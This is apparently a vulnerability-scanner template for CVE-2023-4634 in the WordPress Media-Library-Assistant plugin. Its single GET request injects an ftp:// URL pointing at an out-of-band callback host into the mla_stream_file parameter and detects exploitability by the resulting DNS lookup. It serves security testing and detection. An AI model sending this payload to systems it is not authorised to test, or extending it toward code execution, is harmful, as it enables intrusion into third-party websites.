id: CVE-2023-4634
info:
  name: Local file inclusion which could lead to RCE in media-library-assistant
  author: Pepitoh(Patrowl)
  severity: critical
  description: The Media-Library-Assistant plugin in versions < 3.09 is vulnerable to a local file inclusion, which leads to RCE on a default Imagick installation/configuration.
  reference:
    - https://fr.wordpress.org/plugins/media-library-assistant/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-4634
  tags: cve,cve2023,wordpress
http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/media-library-assistant/includes/mla-stream-image.php?mla_stream_file=ftp://{{interactsh-url}}/patrowl.svg"
    matchers:
      # Match on the out-of-band DNS lookup for the interactsh host named in mla_stream_file
      - type: word
        part: interactsh_protocol
        words:
          - "dns"